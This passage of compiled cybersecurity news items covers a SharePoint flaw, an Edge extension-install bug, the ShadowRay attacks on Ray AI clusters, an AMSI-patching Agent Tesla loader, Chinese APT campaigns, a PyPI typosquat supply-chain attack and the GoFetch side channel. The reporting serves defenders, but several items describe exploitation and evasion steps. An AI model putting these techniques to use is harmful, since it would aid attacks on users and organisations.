"In a network-based attack, an authenticated attacker as a Site Owner could execute code remotely on the SharePoint Server," Microsoft said in an advisory. The flaw was addressed by Microsoft as part of its Patch Tuesday updates for May 2023.
The development comes more than two months after CISA added CVE-2023-29357, a privilege escalation flaw in SharePoint Server, to its KEV catalog.
It's worth pointing out that an exploit chain combining CVE-2023-29357 and CVE-2023-24955 was demonstrated by StarLabs SG at the Pwn2Own Vancouver hacking contest last year, earning the researchers a $100,000 prize.
That said, there is currently no information on the attacks weaponizing these two vulnerabilities and the threat actors that may be exploiting them.
Microsoft previously told The Hacker News that "customers who have enabled automatic updates and enable 'Receive updates for other Microsoft products' option within their Windows Update settings are already protected."
Federal Civilian Executive Branch (FCEB) agencies are required to apply the fixes by April 16, 2024, to secure their networks against active threats.
Microsoft Edge Bug Could Have Allowed Attackers to Silently Install Malicious
Extensions
28.3.24
Vulnerebility
The Hacker News
A now-patched security flaw in the Microsoft Edge web browser could have been abused to install arbitrary extensions on users' systems and carry out malicious actions.
"This flaw could have allowed an attacker to exploit a private API, initially intended for marketing purposes, to covertly install additional browser extensions with broad permissions without the user's knowledge," Guardio Labs security researcher Oleg Zaytsev said in a new report shared with The Hacker News.
Tracked as CVE-2024-21388 (CVSS score: 6.5), it was addressed by Microsoft in Edge stable version 121.0.2277.83 released on January 25, 2024, following responsible disclosure in November 2023. The Windows maker credited both Zaytsev and Jun Kokatsu for reporting the issue.
"An attacker who successfully exploited this vulnerability could gain the privileges needed to install an extension," Microsoft said in an advisory for the flaw, adding it "could lead to a browser sandbox escape."
Describing it as a privilege escalation flaw, the tech giant also emphasized that a successful exploitation of the bug requires an attacker to "take additional actions prior to exploitation to prepare the target environment."
According to Guardio's findings, CVE-2024-21388 allows a bad actor with the ability to run JavaScript on bing[.]com or microsoft[.]com pages to install any extensions from the Edge Add-ons store sans requiring user's consent or interaction.
This is made possible by the fact that the browser comes with privileged access to certain private APIs that make it possible to install an add-on as long as it's from the vendor's own extension marketplace.
One such API in the Chromium-based Edge browser is edgeMarketingPagePrivate, which is accessible from a set of allowlisted websites that belong to Microsoft, including bing[.]com, microsoft[.]com, microsoftedgewelcome.microsoft[.]com, and microsoftedgetips.microsoft[.]com, among others.
The API also packs in a method called installTheme() that, as the name implies,
is designed to install a theme from the Edge Add-ons store by passing a unique
theme identifier ("themeId") and its manifest file as input.
The bug identified by Guardio is essentially a case of insufficient validation, thereby enabling an attacker to provide any extension identifier from the storefront (as opposed to the themeId) and get it stealthily installed.
"As an added bonus, as this extension installation is not done quite in the manner it was originally designed for, there will be no need for any interaction or consent from the user," Zaytsev explained.
In a hypothetical attack scenario leveraging CVE-2024-21388, a threat actor could publish a seemingly harmless extension to the add-ons store and use it to inject a piece of malicious JavaScript code into bing[.]com – or any of the sites that are allowed to access the API – and install an arbitrary extension of their choice by invoking the API using the extension identifier.
Put differently, executing the specially crafted extension on the Edge browser and going to bing[.]com will automatically install the targeted extension without the victim's permission.
Guardio told The Hacker News that while there is no evidence of this bug being exploited in the wild, it highlights the need for balancing user convenience and security, and how browser customizations can inadvertently defeat security mechanisms and introduce several new attack vectors.
"It's relatively easy for attackers to trick users into installing an extension that appears harmless, not realizing it serves as the initial step in a more complex attack," Zaytsev said. "This vulnerability could be exploited to facilitate the installation of additional extensions, potentially for monetary gain."
Critical Unpatched Ray AI Platform Vulnerability Exploited for Cryptocurrency
Mining
28.3.24
Cryptocurrency
The Hacker News
Cybersecurity researchers are
warning that threat actors are actively exploiting a "disputed" and unpatched
vulnerability in an open-source artificial intelligence (AI) platform called
Anyscale Ray to hijack computing power for illicit cryptocurrency mining.
"This vulnerability allows attackers to take over the companies' computing power and leak sensitive data," Oligo Security researchers Avi Lumelsky, Guy Kaplan, and Gal Elbaz said in a Tuesday disclosure.
"This flaw has been under active exploitation for the last seven months, affecting sectors like education, cryptocurrency, biopharma, and more."
The campaign, ongoing since September 2023, has been codenamed ShadowRay by the Israeli application security firm. It also marks the first time AI workloads have been targeted in the wild through shortcomings underpinning the AI infrastructure.
Ray is an open-source, fully-managed compute framework that allows organizations to build, train, and scale AI and Python workloads. It consists of a core distributed runtime and a set of AI libraries for simplifying the ML platform.
It's used by some of the biggest companies, including OpenAI, Uber, Spotify, Netflix, LinkedIn, Niantic, and Pinterest, among others.
The security vulnerability in question is CVE-2023-48022 (CVSS score: 9.8), a critical missing authentication bug that allows remote attackers to execute arbitrary code via the job submission API. It was reported by Bishop Fox alongside two other flaws in August 2023.
The cybersecurity company said the lack of authentication controls in two Ray components, Dashboard, and Client, could be exploited by "unauthorized actors to freely submit jobs, delete existing jobs, retrieve sensitive information, and achieve remote command execution."
This makes it possible to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials. Anyscale, in an advisory published in November 2023, said it does not plan to fix the issue at this point in time.
"That Ray does not have authentication built in – is a long-standing design decision based on how Ray's security boundaries are drawn and consistent with Ray deployment best practices, though we intend to offer authentication in a future version as part of a defense-in-depth strategy," the company noted.
It also cautions in its documentation that it's the platform provider's responsibility to ensure that Ray runs in "sufficiently controlled network environments" and that developers can access Ray Dashboard in a secure fashion.
Oligo said it observed the shadow vulnerability being exploited to breach hundreds of Ray GPU clusters, potentially enabling the threat actors to get hold of a trove of sensitive credentials and other information from compromised servers.
This includes production database passwords, private SSH keys, access tokens related to OpenAI, HuggingFace, Slack, and Stripe, the ability to poison models, and elevated access to cloud environments from Amazon Web Services, Google Cloud, and Microsoft Azure.
In many of the instances, the infected instances have been found to be hacked with cryptocurrency miners (e.g., XMRig, NBMiner, and Zephyr) and reverse shells for persistent remote access.
The unknown attackers behind ShadowRay have also utilized an open-source tool named Interactsh to fly under the radar.
"When attackers get their hands on a Ray production cluster, it is a jackpot," the researchers said. "Valuable company data plus remote code execution makes it easy to monetize attacks — all while remaining in the shadows, totally undetected (and, with static security tools, undetectable)."
Alert: New Phishing Attack Delivers Keylogger Disguised as Bank Payment Notice
28.3.24
Phishing
The Hacker News
A new phishing campaign has been observed leveraging a novel loader malware to deliver an information stealer and keylogger called Agent Tesla.
Trustwave SpiderLabs said it identified a phishing email bearing this attack chain on March 8, 2024. The message masquerades as a bank payment notification, urging the user to open an archive file attachment.
The archive ("Bank Handlowy w Warszawie - dowód wpłaty_pdf.tar.gz") conceals a malicious loader that activates the procedure to deploy Agent Tesla on the compromised host.
"This loader then used obfuscation to evade detection and leveraged polymorphic behavior with complex decryption methods," security researcher Bernard Bautista said in a Tuesday analysis.
"The loader also exhibited the capability to bypass antivirus defenses and retrieved its payload using specific URLs and user agents leveraging proxies to further obfuscate traffic."
The tactic of embedding malware within seemingly benign files is a tactic that has been repeatedly employed by threat actors to trick unsuspecting victims into triggering the infection sequence.
The loader used in the attack is written in .NET, with Trustwave discovering two distinct variants that each make use of a different decryption routine to access its configuration and ultimately retrieve the XOR-encoded Agent Tesla payload from a remote server.
In an effort to evade detection, the loader is also designed to bypass the Windows Antimalware Scan Interface (AMSI), which offers the ability for security software to scan files, memory, and other data for threats.
It achieves this by "patching the AmsiScanBuffer function to evade malware scanning of in-memory content," Bautista explained.
The last phase involves decoding and executing Agent Tesla in memory, allowing the threat actors to stealthily exfiltrate sensitive data via SMTP using a compromised email account associated with a legitimate security system supplier in Turkey ("merve@temikan[.]com[.]tr").
The approach, Trustwave said, not only does not raise any red flags, but also affords a layer of anonymity that makes it harder to trace the attack back to the adversary, not to mention save the effort of having to set up dedicated exfiltration channels.
"[The loader] employs methods like patching to bypass Antimalware Scan Interface
(AMSI) detection and dynamically load payloads, ensuring stealthy execution and
minimizing traces on disk," Bautista said. "This loader marks a notable
evolution in the deployment tactics of Agent Tesla."
The disclosure comes as BlueVoyant uncovered another phishing activity conducted by a cybercrime group called TA544 that leverages PDFs dressed up as legal invoices to propagate WikiLoader (aka WailingCrab) and establish connections with command-and-control (C2) server that almost exclusively encompasses hacked WordPress sites.
It's worth noting that TA544 also weaponized a Windows security bypass flaw tracked as CVE-2023-36025 in November 2023 to distribute Remcos RAT via a different loader family dubbed IDAT Loader, allowing it to seize control of infected systems.
The findings also follow a surge in the use of a phishing kit called Tycoon, which Sekoia said has "become one of the most widespread [adversary-in-the-middle] phishing kits over the last few months, with more than 1,100 domain names detected between late October 2023 and late February 2024."
Tycoon, publicly documented by Trustwave last month, permits cyber criminals to target users of Microsoft 365 with phony login pages to capture their credentials, session cookies, and two-factor authentication (2FA) codes. It's known to be active since at least August 2023, with the service offered via private Telegram channels.
The phishing kit is notable for incorporating extensive traffic filtering methods to thwart bot activity and analysis attempts, requiring site visitors to complete a Cloudflare Turnstile challenge before redirecting users to a credential harvesting page.
Tycoon also shares operational and design-level similarities with the Dadsec OTT phishing kit, raising the possibility that the developers had access to and tweaked the source code of the latter to suit their needs. This is supported by the fact that Dadsec OTT had its source code leaked in October 2023.
"The developer enhanced stealth capabilities in the most recent version of the phishing kit," Sekoia said. "The recent updates could reduce the detection rate by security products of the Tycoon 2FA phishing pages and the infrastructure. Additionally, its ease of use and its relatively low price make it quite popular among threat actors."
Two Chinese APT Groups Ramp Up Cyber Espionage Against ASEAN Countries
27.3.24
APT
The Hacker News
Two China-linked advanced
persistent threat (APT) groups have been observed targeting entities and member
countries affiliated with the Association of Southeast Asian Nations (ASEAN) as
part of a cyber espionage campaign over the past three months.
This includes the threat actor known as Mustang Panda, which has been recently linked to cyber attacks against Myanmar as well as other Asian countries with a variant of the PlugX (aka Korplug) backdoor dubbed DOPLUGS.
Mustang Panda, also called Camaro Dragon, Earth Preta, and Stately Taurus, is believed to have targeted entities in Myanmar, the Philippines, Japan and Singapore, targeting them with phishing emails designed to deliver two malware packages.
"Threat actors created malware for these packages on March 4-5, 2024, coinciding with the ASEAN-Australia Special Summit (March 4-6, 2024)," Palo Alto Networks Unit 42 said in a report shared with The Hacker News.
One of the malware package is a ZIP file that contains within it an executable ("Talking_Points_for_China.exe"), that when launched, loads a DLL file ("KeyScramblerIE.dll") and ultimately deploys a known Mustang Panda malware called PUBLOAD, a downloader previously employed to drop PlugX.
It's worth pointing out here that the binary is a renamed copy of a legitimate software called KeyScrambler.exe that's susceptible to DLL side-loading.
The second package, on the other hand, is a screensaver executable ("Note PSO.scr") that's used to retrieve next-stage malicious code from a remote IP address, including a benign program signed by a video game company renamed as WindowsUpdate.exe and a rogue DLL that's launched using the same technique as before.
"This malware then attempts to establish a connection to www[.]openservername[.]com at 146.70.149[.]36 for command-and-control (C2)," the researchers said.
Unit 42 said it also detected network traffic between an ASEAN-affiliated entity and the C2 infrastructure of a second Chinese APT group, suggesting a breach of the victim's environment. This unnamed threat activity cluster has been attributed to similar attacks targeting Cambodia.
"These types of campaigns continue to demonstrate how organizations are targeted for cyber espionage purposes, where nation-state affiliated threat groups collect intelligence of geopolitical interests within the region," the researchers said.
Earth Krahang Emerges in Wild#
The findings arrive a week after Trend Micro
shed light on a new Chinese threat actor known as Earth Krahang that has
targeted 116 entities spanning 35 countries by leveraging spear-phishing and
flaws in public-facing Openfire and Oracle servers to deliver bespoke malware
such as PlugX, ShadowPad, ReShell, and DinodasRAT (aka XDealer).
The earliest attacks date back to early 2022, with the adversary leveraging a combination of methods to scan for sensitive data.
Earth Krahang, which has a strong focus in Southeast Asia, also exhibits some
level of overlap with another China-nexus threat actor tracked as Earth Lusca
(aka RedHotel). Both the intrusion sets are likely managed by the same threat
actor and connected to a Chinese government contractor called I-Soon.
"One of the threat actor's favorite tactics involves using its malicious access to government infrastructure to attack other government entities, abusing the infrastructure to host malicious payloads, proxy attack traffic, and send spear-phishing emails to government-related targets using compromised government email accounts," the company said.
"Earth Krahang also uses other tactics, such as building VPN servers on compromised public-facing servers to establish access into the private network of victims and performing brute-force attacks to obtain email credentials. These credentials are then used to exfiltrate victim emails."
The I-Soon Leaks and the Shadowy Hack-for-hire Scene#
Last month, a set of
leaked documents from I-Soon (aka Anxun) on GitHub revealed how the company
sells a wide array of stealers and remote access trojans like ShadowPad and
Winnti (aka TreadStone) to multiple Chinese government entities. This also
encompasses an integrated operations platform that's designed to carry out
offensive cyber campaigns and an undocumented Linux implant codenamed Hector.
"The integrated operations platform encompasses both internal and external applications and networks," Bishop Fox said. "The internal application is mainly for mission and resource management. The external application is designed to carry out cyber operations."
The obscure hack-for-hire entity has also been implicated in the 2019 POISON CARP campaign aimed at Tibetan groups and the 2022 hack of Comm100, in addition to attacks targeting foreign governments and domestic ethnic minorities to gain valuable information, some of which are carried out independently on their own in hopes of landing a government customer.
"The data leak has provided rare insight into how the Chinese government outsources parts of its cyber operations to private third-party companies, and how these companies work with one another to fulfill these demands," ReliaQuest noted.
Cybersecurity firm Recorded Future, in its own analysis, said the leak unravels the "operational and organizational ties" between the company and three different Chinese state-sponsored cyber groups such as RedAlpha (aka Deepcliff), RedHotel, and POISON CARP.
"It provides supporting evidence regarding the long-suspected presence of 'digital quartermasters' that provide capabilities to multiple Chinese state-sponsored groups."
It also said the overlaps suggest the presence of multiple sub-teams focused on particular missions within the same company. I-Soon's victimology footprint spreads to at least 22 countries, with government, telecommunications, and education representing the most targeted sectors.
Furthermore, the publicized documents confirm that Tianfu Cup – China's own take on the Pwn2Own hacking contest – acts as a "vulnerability feeder system" for the government, allowing it to stockpile zero-day exploits and devise exploit code.
"When the Tianfu Cup submissions aren't already full exploit chains, the Ministry of Public Security disseminates the proof of concept vulnerabilities to private firms to further exploit these proof-of-concept capabilities," Margin Research said.
"China's vulnerability disclosure requirement is one part of the puzzle of how China stockpiles and weaponizes vulnerabilities, setting in stone the surreptitious collection offered by Tianfu Cup in previous years."
The source of the leak is currently not known, although two employees of I-Soon told The Associated Press that an investigation is ongoing in collaboration with law enforcement. The company's website has since gone offline.
"The leak provides some of the most concrete details seen publicly to date, revealing the maturing nature of China's cyber espionage ecosystem," SentinelOne's Dakota Cary and Aleksandar Milenkoski said. "It shows explicitly how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire."
Sketchy NuGet Package Likely Linked to Industrial Espionage Targets Developers
27.3.24
BigBrothers
The Hacker News
Threat hunters have identified a suspicious package in the NuGet package manager that's likely designed to target developers working with tools made by a Chinese firm that specializes in industrial- and digital equipment manufacturing.
The package in question is SqzrFramework480, which ReversingLabs said was first published on January 24, 2024. It has been downloaded 2,999 times as of writing.
The software supply chain security firm said it did not find any other package that exhibited similar behavior.
It, however, theorized the campaign could likely be used for orchestrating industrial espionage on systems equipped with cameras, machine vision, and robotic arms.
The indication that SqzrFramework480 is seemingly tied to a Chinese firm named Bozhon Precision Industry Technology Co., Ltd. comes from the use of a version of the company's logo for the package's icon. It was uploaded by a Nuget user account called "zhaoyushun1999."
Present within the library is a DLL file "SqzrFramework480.dll" that comes with features to take screenshots, ping a remote IP address after every 30 seconds until the operation is successful, and transmit the screenshots over a socket created and connected to said IP address.
"None of those behaviors are resolutely malicious. However, when taken together, they raise alarms," security researcher Petar Kirhmajer said. "The ping serves as a heartbeat check to see if the exfiltration server is alive."
The malicious use of sockets for data communication and exfiltration has been
observed in the wild previously, as in the case of the npm package
nodejs_net_server.
The exact motive behind the package is unclear as yet, although it's a known fact that adversaries are steadily resorting to concealing nefarious code in seemingly benign software to compromise victims.
An alternate, innocuous explanation could be that the package was leaked by a developer or a third party that works with the company.
"They may also explain seemingly malicious continuous screen capture behavior: it could simply be a way for a developer to stream images from the camera on the main monitor to a worker station," Kirhmajer said.
The ambiguity surrounding the package aside, the findings underscore the complicated nature of supply chain threats, making it imperative that users scrutinize libraries prior to downloading them.
"Open-source repositories like NuGet are increasingly hosting suspicious and malicious packages designed to attract developers and trick them into downloading and incorporating malicious libraries and other modules into their development pipelines," Kirhmajer said.
U.S. Charges 7 Chinese Nationals in Major 14-Year Cyber Espionage Operation
27.3.24
BigBrothers
The Hacker News
The U.S. Department of Justice
(DoJ) on Monday unsealed indictments against seven Chinese nationals for their
involvement in a hacking group that targeted U.S. and foreign critics,
journalists, businesses, and political officials for about 14 years.
The defendants include Ni Gaobin (倪高彬), Weng Ming (翁明), Cheng Feng (程锋), Peng Yaowen (彭耀文), Sun Xiaohui (孙小辉), Xiong Wang (熊旺), and Zhao Guangzong (赵光宗).
The suspected cyber spies have been charged with conspiracy to commit computer intrusions and conspiracy to commit wire fraud in connection with a state-sponsored threat group tracked as APT31, which is also known as Altaire, Bronze Vinewood, Judgement Panda, and Violet Typhoon (formerly Zirconium). The hacking collective has been active since at least 2010.
Specifically, their responsibilities entail testing and exploiting the malware used to conduct the intrusions, managing the attack infrastructure, and conducting surveillance of specific U.S. entities, federal prosecutors noted, adding the campaigns are designed to advance China's economic espionage and foreign intelligence objectives.
Both Gaobin and Guangzong are alleged to be linked to Wuhan Xiaoruizhi Science and Technology Company, Limited (Wuhan XRZ), a front company that's believed to have conducted several malicious cyber operations for the Ministry of State Security (MSS).
Intrusion Truth, in a report published in May 2023, characterized Wuhan XRZ as a "sketchy-looking company in Wuhan looking for vulnerability-miners and foreign language experts."
As well as announcing a reward of up to $10 million for information that could lead to identification or whereabouts of people associated with APT31, the U.K. and the U.S. have also levied sanctions against Gaobin, Guangzong, and Wuhan XRZ for endangering national security and for targeting parliamentarians across the world.
"These allegations pull back the curtain on China's vast illegal hacking operation that targeted sensitive data from U.S. elected and government officials, journalists and academics; valuable information from American companies; and political dissidents in America and abroad," stated U.S. Attorney Breon Peace.
"Their sinister scheme victimized thousands of people and entities across the world, and lasted for well over a decade."
The sprawling hacking operation – which took place between at least 2010 and November 2023 – involved the defendants and other members of APT31 sending more than 10,000 emails to targets of interest that purported to be from prominent journalists and seemingly contained legitimate news articles.
But, in reality, they came with hidden tracking links that would allow information about the victims' location, internet protocol (IP) addresses, network schematics, and the devices used to access the email accounts to be exfiltrated simply upon opening the messages.
This information subsequently enabled the threat actors to conduct more targeted attacks tailored to specific individuals, including by compromising the recipients' home routers and other electronic devices.
The threat actors are also said to have leveraged zero-day exploits to maintain persistent access to victim computer networks, resulting in the confirmed and potential theft of telephone call records, cloud storage accounts, personal emails, economic plans, intellectual property, and trade secrets associated with U.S. businesses.
Other spear-phishing campaigns orchestrated by APT31 have further been found to target U.S. government officials working in the White House, at the Departments of Justice, Commerce, Treasury and State, and U.S. Senators, Representatives, and election campaign staff of both political parties.
The attacks were facilitated by means of custom malware such as RAWDOOR, Trochilus RAT, EvilOSX, DropDoor/DropCat, and others that established secure connections with adversary-controlled servers to receive and execute commands on the victim machines. Also put to use was a cracked version of Cobalt Strike Beacon to conduct post-exploitation activities.
Some of the prominent sectors targeted by the group are defense, information technology, telecommunications, manufacturing and trade, finance, consulting, and legal and research industries. APT31 also singled out dissidents around the world and others who were perceived to be supporting them.
"APT31 is a collection of Chinese state-sponsored intelligence officers, contract hackers, and support staff that conduct malicious cyber operations on behalf of the Hubei State Security Department (HSSD)," the Treasury said.
"In 2010, the HSSD established Wuhan XRZ as a front company to carry out cyber operations. This malicious cyber activity resulted in the surveillance of U.S. and foreign politicians, foreign policy experts, academics, journalists, and pro-democracy activists, as well as persons and companies operating in areas of national importance."
"Chinese state-sponsored cyber espionage is not a new threat and the DoJ's unsealed indictment today showcases the full gambit of their cyber operations in order to advance the People's Republic of China (PRC) agenda. While this is not a new threat, the scope of the espionage and the tactics deployed are concerning," Alex Rose, director of government partnerships at Secureworks Counter Threat Unit, said.
"The Chinese have evolved their typical MO in the last couple of years to evade detection and make it harder to attribute specific cyber-attacks to them. This is part of a broader strategic effort that China is able to execute on. The skills, resources and tactics at the disposal of the PRC make them an ongoing high and persistent threat to governments, businesses, and organizations around the world."
The charges come after the U.K. government pointed fingers at APT31 for targeting parliamentarians' emails in 2021 and an unnamed China state-affiliated threat actor for "malicious cyber campaigns" aimed at the Electoral Commission. The breach of the Electoral Commission led to the unauthorized access of voter data belonging to 40 million people.
The incident was disclosed by the regulator in August 2023, although there is evidence that the threat actors accessed the systems two years prior to it.
Coinciding with the revelations from the U.K. and the U.S., New Zealand said it uncovered links between the Chinese state-sponsored apparatus and cyber attacks against parliamentary entities in the country in 2021. The activity has been attributed to another MSS-backed group tracked as APT40 (aka Bronze Mohawk, Gingham Typhoon, ISLANDDREAMS, and Kryptonite Panda).
Australia, in its own statement, expressed "serious concerns" about the malicious cyber activities conducted by China state-sponsored actors targeting the U.K., and called on "all states to act responsibly in cyberspace." However, it claimed that its own electoral systems "were not compromised by the cyber campaigns targeting the U.K."
China, however, has rejected the accusations, describing them as "completely fabricated" and amounting to "malicious slanders." A spokesperson for the Chinese embassy in Washington D.C. told the BBC News the countries have "made groundless accusations."
"The origin-tracing of cyberattacks is highly complex and sensitive. When investigating and determining the nature of cyber cases, one needs to have adequate and objective evidence, instead of smearing other countries when facts do not exist, still less politicize cybersecurity issues," Foreign Ministry Spokesperson Lin Jian said.
"We hope relevant parties will stop spreading disinformation, take a responsible attitude and jointly safeguard peace and security in the cyberspace. China opposes illegal and unilateral sanctions and will firmly safeguard its lawful rights and interests."
U.S. Sanctions 3 Cryptocurrency Exchanges for Helping Russia Evade Sanctions
27.3.24
Cryptocurrency
The Hacker News
The U.S. Department of the
Treasury's Office of Foreign Assets Control (OFAC) sanctioned three
cryptocurrency exchanges for offering services used to evade economic
restrictions imposed on Russia following its invasion of Ukraine in early 2022.
This includes Bitpapa IC FZC LLC, Crypto Explorer DMCC (AWEX), and Obshchestvo S Ogranichennoy Otvetstvennostyu Tsentr Obrabotki Elektronnykh Platezhey (TOEP).
In all, the designations cover thirteen entities and two individuals operating in the Russian financial services and technology sectors.
"Many of the individuals and entities designated today facilitated transactions or offered other services that helped OFAC-designated entities evade sanctions," the Treasury said, adding the action seeks to "target companies servicing Russia's core financial infrastructure and curtail Russia's use of the international financial system to further its war against Ukraine."
Bitpapa, which offers virtual currency exchange to Russian nationals, has been accused of facilitating transactions worth millions of dollars with sanctioned Russian entities Hydra Market and Garantex.
Crypto Explorer, the Treasury said, offers currency conversion services between virtual currencies, rubles, and UAE dirhams.
"AWEX offers cash services at its offices in Moscow and Dubai and also loads funds onto credit cards associated with OFAC-designated Russian banks such as Sberbank and Alfa-Bank," it added.
Also sanctioned is another virtual currency exchange run by TOEP that's alleged to have enabled digital payments in rubles and virtual currencies to sanctioned entities such as Sberbank, Alfa-Bank, and Hydra Market.
The penalty list also features Moscow-based fintech companies such as B-Crypto, Masterchain and Laitkhaus, which have partnered with sanctioned Russian banks to issue, exchange, and transfer cryptocurrency assets.
Pursuant to the sanctions, all properties and interests in the U.S. connected to designated individuals and entities will be frozen. Furthermore, entities at least 50% owned directly or indirectly by one or more blocked persons will also be subject to the blockade.
"Russia is increasingly turning to alternative payment mechanisms to circumvent U.S. sanctions and continue to fund its war against Ukraine," said Brian E. Nelson, Under Secretary of the Treasury for Terrorism and Financial Intelligence.
"As the Kremlin seeks to leverage entities in the financial technology space, Treasury will continue to expose and disrupt the companies that seek to help sanctioned Russian financial institutions reconnect to the global financial system."
CISA Alerts on Active Exploitation of Flaws in Fortinet, Ivanti, and Nice
Products
26.3.24
BigBrothers
The Hacker News
The U.S. Cybersecurity and
Infrastructure Security Agency (CISA) on Monday placed three security flaws to
its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active
exploitation.
The vulnerabilities added are as follows -
CVE-2023-48788 (CVSS score: 9.3) - Fortinet FortiClient EMS SQL Injection
Vulnerability
CVE-2021-44529 (CVSS score: 9.8) - Ivanti Endpoint Manager
Cloud Service Appliance (EPM CSA) Code Injection Vulnerability
CVE-2019-7256
(CVSS score: 10.0) - Nice Linear eMerge E3-Series OS Command Injection
Vulnerability
The shortcoming impacting Fortinet FortiClient EMS came to
light earlier this month, with the company describing it as a flaw that could
allow an unauthenticated attacker to execute unauthorized code or commands via
specifically crafted requests.
Fortinet has since revised its advisory to confirm that it has been exploited in the wild, although no other details regarding the nature of the attacks are currently available.
CVE-2021-44529, on the other hand, concerns a code injection vulnerability in Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) that allows an unauthenticated user to execute malicious code with limited permissions.
Recent research published by security researcher Ron Bowes indicates that the flaw may have been introduced as an intentional backdoor in a now-discontinued open-source project called csrf-magic that existed at least since 2014.
CVE-2019-7256, which permits an attacker to conduct remote code execution on Nice Linear eMerge E3-Series access controllers, has been exploited by threat actors as early as February 2020.
The flaw, alongside 11 other bugs, were addressed by Nice (formerly Nortek) earlier this month. That said, these vulnerabilities were originally disclosed by security researcher Gjoko Krstic in May 2019.
In light of the active exploitation of the three flaws, federal agencies are required to apply the vendor-provided mitigations by April 15, 2024.
The development comes as CISA and the Federal Bureau of Investigation (FBI) released a joint alert, urging software manufacturers to take steps to mitigate SQL injection flaws.
The advisory specifically highlighted the exploitation of CVE-2023-34362, a critical SQL injection vulnerability in Progress Software's MOVEit Transfer, by the Cl0p ransomware gang (aka Lace Tempest) to breach thousands of organizations.
"Despite widespread knowledge and documentation of SQLi vulnerabilities over the past two decades, along with the availability of effective mitigations, software manufacturers continue to develop products with this defect, which puts many customers at risk," the agencies said.
Hackers Hijack GitHub Accounts in Supply Chain Attack Affecting Top-gg and
Others
26.3.24
Hacking
The Hacker News
Unidentified adversaries orchestrated a sophisticated attack campaign that has impacted several individual developers as well as the GitHub organization account associated with Top.gg, a Discord bot discovery site.
"The threat actors used multiple TTPs in this attack, including account takeover via stolen browser cookies, contributing malicious code with verified commits, setting up a custom Python mirror, and publishing malicious packages to the PyPI registry," Checkmarx said in a technical report shared with The Hacker News.
The software supply chain attack is said to have led to the theft of sensitive information, including passwords, credentials, and other valuable data. Some aspects of the campaign were previously disclosed at the start of the month by an Egypt-based developer named Mohammed Dief.
It chiefly entailed setting up a clever typosquat of the official PyPI domain known as "files.pythonhosted[.]org," giving it the name "files.pypihosted[.]org" and using it to host trojanized versions of well-known packages like colorama. Cloudflare has since taken down the domain.
"The threat actors took Colorama (a highly popular tool with 150+ million monthly downloads), copied it, and inserted malicious code," Checkmarx researchers said. "They then concealed the harmful payload within Colorama using space padding and hosted this modified version on their typosquatted-domain fake-mirror."
These rogue packages were then propagated via GitHub repositories such as github[.]com/maleduque/Valorant-Checker and github[.]com/Fronse/League-of-Legends-Checker that contained a requirements.txt file, which serves as the list of Python packages to be installed by the pip package manager.
One repository that continues to remain active as of writing is github[.]com/whiteblackgang12/Discord-Token-Generator, which includes a reference to the malicious version of colorama hosted on "files.pypihosted[.]org."
Also altered as part of the campaign is the requirements.txt file associated
with Top.gg's python-sdk by an account named editor-syntax on February 20, 2024.
The issue has been addressed by the repository maintainers.
It's worth noting that the "editor-syntax" account is a legitimate maintainer of the Top.gg GitHub organization and has write permissions to Top.gg's repositories, indicating that the threat actor managed to hijack the verified account in order to make a malicious commit.
"The GitHub account of 'editor-syntax' was likely hijacked through stolen cookies," Checkmarx noted.
"The attacker gained access to the account's session cookies, allowing them to bypass authentication and perform malicious activities using the GitHub UI. This method of account takeover is particularly concerning, as it does not require the attacker to know the account's password."
What's more, the threat actors behind the campaign are said to have pushed multiple changes to the rogue repositories in one single commit, altering as many as 52 files in one instance in an effort to conceal the changes to the requirements.txt file.
The activity is believed to have commenced back in November 2022, when the attackers uploaded a series of four counterfeit packages to the PyPI repository. Subsequently, 10 other packages made their way to PyPI, the most recent being "yocolor" that was published on March 5, 2024.
"Yocolor" is also engineered to propagate the malware-laced "colorama" package, underscoring the threat actor's exploitation of the trust in the open-source package ecosystem to install the rogue library by listing it as a dependency in the project's requirements.txt file.
The malware embedded in the counterfeit colorama package activates a multi-stage infection sequence that leads to the execution of Python code from a remote server, which, in turn, is capable of establishing persistence on the host via Windows Registry changes and stealing data from web browsers, crypto wallets, Discord tokens, and session tokens related to Instagram and Telegram.
"The malware includes a file stealer component that searches for files with specific keywords in their names or extensions," the researchers said. "It targets directories such as Desktop, Downloads, Documents, and Recent Files."
The captured data is ultimately transferred to the attackers via anonymous file-sharing services like GoFile and Anonfiles. Alternately, the data is also sent to the threat actor's infrastructure using HTTP requests, alongside the hardware identifier or IP address to track the victim machine.
"This campaign is a prime example of the sophisticated tactics employed by malicious actors to distribute malware through trusted platforms like PyPI and GitHub," the researchers concluded.
"This incident highlights the importance of vigilance when installing packages and repositories even from trusted sources. It is crucial to thoroughly vet dependencies, monitor for suspicious network activity, and maintain robust security practices to mitigate the risk of falling victim to such attacks."
Update#
The repository
"github[.]com/whiteblackgang12/Discord-Token-Generator" is now no longer
accessible on GitHub.
New "GoFetch" Vulnerability in Apple M-Series Chips Leaks Secret Encryption Keys
26.3.24
Vulnerebility
The Hacker News
A new security shortcoming discovered in Apple M-series chips could be exploited to extract secret keys used during cryptographic operations.
Dubbed GoFetch, the vulnerability relates to a microarchitectural side-channel attack that takes advantage of a feature known as data memory-dependent prefetcher (DMP) to target constant-time cryptographic implementations and capture sensitive data from the CPU cache. Apple was made aware of the findings in December 2023.
Prefetchers are a hardware optimization technique that predicts what memory addresses a currently running program will access in the near future and retrieve the data into the cache accordingly from the main memory. The goal of this approach is to reduce the program's memory access latency.
DMP is a type of prefetcher that takes into account the contents of memory based on previously observed access patterns when determining what to prefetch. This behavior makes it ripe for cache-based attacks that trick the prefetcher into revealing the contents associated with a victim process that should be otherwise inaccessible.
GoFetch also builds on the foundations of another microarchitectural attack called Augury that employs DMP to leak data speculatively.
"DMP activates (and attempts to dereference) data loaded from memory that 'looks like' a pointer," a team of seven academics from the University of Illinois Urbana-Champaign, University of Texas, Georgia Institute of Technology, University of California, Berkeley, University of Washington, and Carnegie Mellon University said.
"This explicitly violates a requirement of the constant-time programming paradigm, which forbids mixing data and memory access patterns."
Like other attacks of this kind, the setup requires that the victim and attacker have two different processes co-located on the same machine and on the same CPU cluster. Specifically, the threat actor could lure a target into downloading a malicious app that exploits GoFetch.
What's more, while the attacker and the victim do not share memory, the attacker can monitor any microarchitectural side channels available to it, e.g., cache latency.
